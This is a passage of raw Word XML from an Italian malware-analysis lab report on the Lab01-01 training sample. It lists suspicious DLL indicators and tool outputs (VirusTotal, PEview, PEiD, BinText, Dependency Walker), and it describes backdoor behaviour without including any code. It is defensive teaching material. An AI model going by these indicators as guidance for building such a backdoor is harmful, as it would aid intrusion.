            <wp:docPr id="1885078534" name="Immagine 1885078534" descr="freccia icona png, frecce segno png, frecce nere png 935125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cia icona png, frecce segno png, frecce nere png 9351258 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9491" t="29238" r="20084" b="28454"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="174307" cy="122047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00756BEB">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00756BEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A82DD4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="it-IT"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Libreria Windows Sockets ws2_32.dll , è richiesto da Windows e dalle applicazioni per gestire le connessioni di rete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE7F0CD" w14:textId="5E3E3EBB" w:rsidR="00750793" w:rsidRDefault="005041A8" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB08DB8" wp14:editId="5D05B93A">
            <wp:extent cx="6419273" cy="600364"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="7988853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5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1948" t="28202" r="1385" b="16246"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6419501" cy="600385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C97F5A1" w14:textId="305592A7" w:rsidR="00E74964" w:rsidRDefault="00F023B3" w:rsidP="00750793">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61C3B242" wp14:editId="2F5F3368">
            <wp:extent cx="4906668" cy="4053840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1527305165" name="Immagine 7" descr="Immagine che contiene testo, schermata, software, numero&#10;&#10;Descrizione generata automaticamente">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5165" name="Immagine 7" descr="Immagine che contiene testo, schermata, software, numero&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId156"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId157">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2365"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4947146" cy="4087283"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6780B" w14:textId="77777777" w:rsidR="00E74964" w:rsidRDefault="00E74964" w:rsidP="00E74964">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="0048406D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Ci sono altri file o indicatori basati sull'host che si possono cercare sui sistemi infetti?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F4D15" w14:textId="05CB739A" w:rsidR="00015A99" w:rsidRPr="00CB67BB" w:rsidRDefault="001C7ABC" w:rsidP="00015A99">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sono state rilevate due dll che solitamente non </w:t>
      </w:r>
      <w:r w:rsidR="0021785D">
        <w:t>dovrebbero essere presenti nei sistemi, ovvero “</w:t>
      </w:r>
      <w:r w:rsidR="0021785D" w:rsidRPr="00974CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerne</w:t>
      </w:r>
      <w:r w:rsidR="00974CA5" w:rsidRPr="00974CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>132</w:t>
      </w:r>
      <w:r w:rsidR="00974CA5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00974CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="0021785D">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00974CA5">
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidR="00CB67BB">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00CB67BB" w:rsidRPr="00CB67BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab01–01.</w:t>
      </w:r>
      <w:r w:rsidR="00CB67BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dll”. </w:t>
      </w:r>
      <w:r w:rsidR="00CB67BB">
        <w:t xml:space="preserve">La presenza di questi dll potrebbe </w:t>
      </w:r>
      <w:r w:rsidR="00934DA6">
        <w:t>verificare l’infezione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745A0BB" w14:textId="7535119C" w:rsidR="00E74964" w:rsidRDefault="00E74964" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0667FE83" w14:textId="77777777" w:rsidR="00E74964" w:rsidRDefault="00E74964" w:rsidP="00E74964">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="0048406D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Quali indicatori basati sulla rete potrebbero essere utilizzati per trovare questo malware sui computer infetti?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A93A77" w14:textId="77BD569A" w:rsidR="00E74964" w:rsidRDefault="004758EF" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analizzando il traffico della rete </w:t>
      </w:r>
      <w:r w:rsidR="0064389A">
        <w:t xml:space="preserve">possono essere considerati infetti </w:t>
      </w:r>
      <w:r w:rsidR="00CF0205">
        <w:t>i sistemi che interagiscono con l’ip in figura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55843F07" w14:textId="0CCF01B0" w:rsidR="008E26D7" w:rsidRDefault="008E26D7" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="008E26D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C807CB3" wp14:editId="51DFBE72">
            <wp:extent cx="6645910" cy="725170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7669546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4648" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId158"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="725170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889EAE1" w14:textId="77777777" w:rsidR="00E74964" w:rsidRDefault="00E74964" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC6E926" w14:textId="5E9BAA20" w:rsidR="00F01C02" w:rsidRDefault="00E74964" w:rsidP="00E74964">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="0048406D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Quale sarebbe lo scopo di questi file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B7A770" w14:textId="3B8F605B" w:rsidR="00E74964" w:rsidRDefault="00CF0205" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dall’analisi dei file </w:t>
      </w:r>
      <w:r w:rsidR="00435495">
        <w:t xml:space="preserve">si può dedurre che sia un malware (trojan) </w:t>
      </w:r>
      <w:r w:rsidR="00350518">
        <w:t xml:space="preserve">il quale </w:t>
      </w:r>
      <w:r w:rsidR="00350518" w:rsidRPr="00350518">
        <w:t>crea una backdoor e si connette a un server e trasferisce le informazioni critiche.</w:t>
      </w:r>
      <w:r w:rsidR="00441E6D">
        <w:t xml:space="preserve"> Infine u</w:t>
      </w:r>
      <w:r w:rsidR="00441E6D" w:rsidRPr="00441E6D">
        <w:t>tilizza anche la funzione exec, il che significa che eseguirà altri programmi</w:t>
      </w:r>
      <w:r w:rsidR="008A2723">
        <w:t xml:space="preserve"> e poi attender</w:t>
      </w:r>
      <w:r w:rsidR="001461B2">
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="008A2723">
        <w:t xml:space="preserve"> tramite la funzione</w:t>
      </w:r>
      <w:r w:rsidR="00441E6D" w:rsidRPr="00441E6D">
        <w:t xml:space="preserve"> sleep</w:t>
      </w:r>
      <w:r w:rsidR="00CD0191">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB5A403" w14:textId="77777777" w:rsidR="00CD0191" w:rsidRDefault="00CD0191" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD5767B" w14:textId="584C2D1C" w:rsidR="009B73EC" w:rsidRDefault="009B73EC" w:rsidP="009B73EC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc140165814"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:r w:rsidR="00BE0633">
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="38FDF248" w14:textId="6CF5675B" w:rsidR="004F0871" w:rsidRPr="004F0871" w:rsidRDefault="00220B67" w:rsidP="0002121A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0594A567" wp14:editId="39B7B5F4">
            <wp:extent cx="6645910" cy="4166235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1437402004" name="Immagine 4" descr="Immagine che contiene testo, software, Icona del computer, Pagina Web&#10;&#10;Descrizione generata automaticamente">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004" name="Immagine 4" descr="Immagine che contiene testo, software, Icona del computer, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId159"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4166235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D8AFFCD" wp14:editId="57CC1D3E">
            <wp:extent cx="6645910" cy="4175760"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1902032509" name="Immagine 5" descr="Immagine che contiene testo, software, Icona del computer, Pagina Web&#10;&#10;Descrizione generata automaticamente">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2509" name="Immagine 5" descr="Immagine che contiene testo, software, Icona del computer, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId160"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4175760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF988A1" w14:textId="0C12BFC9" w:rsidR="001461B2" w:rsidRDefault="001A1475" w:rsidP="0002121A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="465433C1" wp14:editId="4C8AB7ED">
            <wp:extent cx="6645910" cy="4417060"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="706371665" name="Immagine 6" descr="Immagine che contiene testo, ricevuta, documento, schermata&#10;&#10;Descrizione generata automaticamente">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1665" name="Immagine 6" descr="Immagine che contiene testo, ricevuta, documento, schermata&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId161"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4417060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="088433E7" w14:textId="0F39B7B8" w:rsidR="001A1475" w:rsidRDefault="001A1475" w:rsidP="001A1475">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc140165815"/>
      <w:r>
        <w:t>6.3 PE</w:t>
      </w:r>
      <w:r w:rsidR="003F150C">
        <w:t>view</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="36A09D72" w14:textId="0A8C34C8" w:rsidR="008235C1" w:rsidRDefault="00A84A16" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il dato nascosto </w:t>
      </w:r>
      <w:r w:rsidR="008D4B18">
        <w:t xml:space="preserve"> è ‘ 4D0E2FD3’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B13015" w14:textId="43735B29" w:rsidR="008235C1" w:rsidRDefault="003F150C" w:rsidP="0002121A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7D112E" wp14:editId="00BEE83A">
            <wp:extent cx="6645910" cy="2486025"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1888356810" name="Immagine 7" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">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6810" name="Immagine 7" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId162"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId163"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2486025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4223A" w14:textId="77777777" w:rsidR="008D4B18" w:rsidRDefault="008D4B18" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797CAB8B" w14:textId="7B53FDE6" w:rsidR="000212C1" w:rsidRDefault="000212C1" w:rsidP="000212C1">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc140165816"/>
      <w:r>
        <w:t>6.4 PEiD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="63E39347" w14:textId="1AA62308" w:rsidR="00303F58" w:rsidRPr="00303F58" w:rsidRDefault="00303F58" w:rsidP="00303F58">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il primo byte è 55,8B,EC,6A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194EA780" w14:textId="77777777" w:rsidR="000212C1" w:rsidRDefault="000212C1" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BF4194" w14:textId="5567CC42" w:rsidR="008D4B18" w:rsidRDefault="000212C1" w:rsidP="0002121A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A13E296" wp14:editId="36DFA67A">
            <wp:extent cx="3419856" cy="1961388"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="578606639" name="Immagine 8" descr="Immagine che contiene testo, schermata, schermo, Carattere&#10;&#10;Descrizione generata automaticamente">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6639" name="Immagine 8" descr="Immagine che contiene testo, schermata, schermo, Carattere&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId164"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3453158" cy="1980488"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B17CA54" w14:textId="1B389024" w:rsidR="0002121A" w:rsidRPr="0002121A" w:rsidRDefault="0002121A" w:rsidP="00C76552">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc140165817"/>
      <w:r>
        <w:t>6.5 BinText</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="31976639" w14:textId="11CB9F3C" w:rsidR="0002121A" w:rsidRDefault="00C76552" w:rsidP="00C76552">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BA88BCD" wp14:editId="3D027302">
            <wp:extent cx="3584448" cy="4917879"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1519343507" name="Immagine 9" descr="Immagine che contiene testo, schermata, computer, software&#10;&#10;Descrizione generata automaticamente">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3507" name="Immagine 9" descr="Immagine che contiene testo, schermata, computer, software&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId166"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId167"/>
                    <a:srcRect r="20474" b="14493"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3640374" cy="4994610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373FE69" w14:textId="72281824" w:rsidR="00C76552" w:rsidRDefault="006C08F4" w:rsidP="00C76552">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea un nuovo processo </w:t>
      </w:r>
      <w:r w:rsidR="00247E9F">
        <w:t>e va in sleep in attesa di comand</w:t>
      </w:r>
      <w:r w:rsidR="00E27F96">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="003B0EE6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A681969" w14:textId="7328CDE5" w:rsidR="00E27F96" w:rsidRDefault="00E27F96" w:rsidP="00C76552">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Inoltre è stata rilevata la stinga sospetta “WARNING_THIS_WILL_DESTROY_YOUR_MACHINE”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32390CF1" w14:textId="77777777" w:rsidR="00E27F96" w:rsidRDefault="00E27F96" w:rsidP="00C76552">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6987D62C" w14:textId="6332D0A3" w:rsidR="00E27F96" w:rsidRPr="0002121A" w:rsidRDefault="00E27F96" w:rsidP="00E27F96">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc140165818"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.6 Dependency Walker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="786B9D1B" w14:textId="77777777" w:rsidR="008502C4" w:rsidRDefault="0051107C" w:rsidP="008502C4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04080627" wp14:editId="081A5AFF">
            <wp:extent cx="5468112" cy="2178748"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="869341767" name="Immagine 10" descr="Immagine che contiene schermata, testo, software&#10;&#10;Descrizione generata automaticamente">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1767" name="Immagine 10" descr="Immagine che contiene schermata, testo, software&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId168"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId169"/>
                    <a:srcRect l="32058" t="1" r="12335" b="55627"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5497201" cy="2190338"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B485C03" w14:textId="431ED1E3" w:rsidR="008502C4" w:rsidRDefault="008502C4" w:rsidP="008502C4">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il </w:t>
      </w:r>
      <w:r w:rsidR="00D42CE4">
        <w:t xml:space="preserve">file Lab01-01.exe </w:t>
      </w:r>
      <w:r w:rsidR="00454310">
        <w:t xml:space="preserve">utilizza FindFirstFileA e FindNexrFileA </w:t>
      </w:r>
      <w:r w:rsidR="002451E8">
        <w:t>da Kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5235F5" w14:textId="77777777" w:rsidR="008502C4" w:rsidRDefault="008502C4" w:rsidP="008502C4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A5C3CB" w14:textId="41FE92CA" w:rsidR="00B55901" w:rsidRDefault="00B55901" w:rsidP="008502C4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
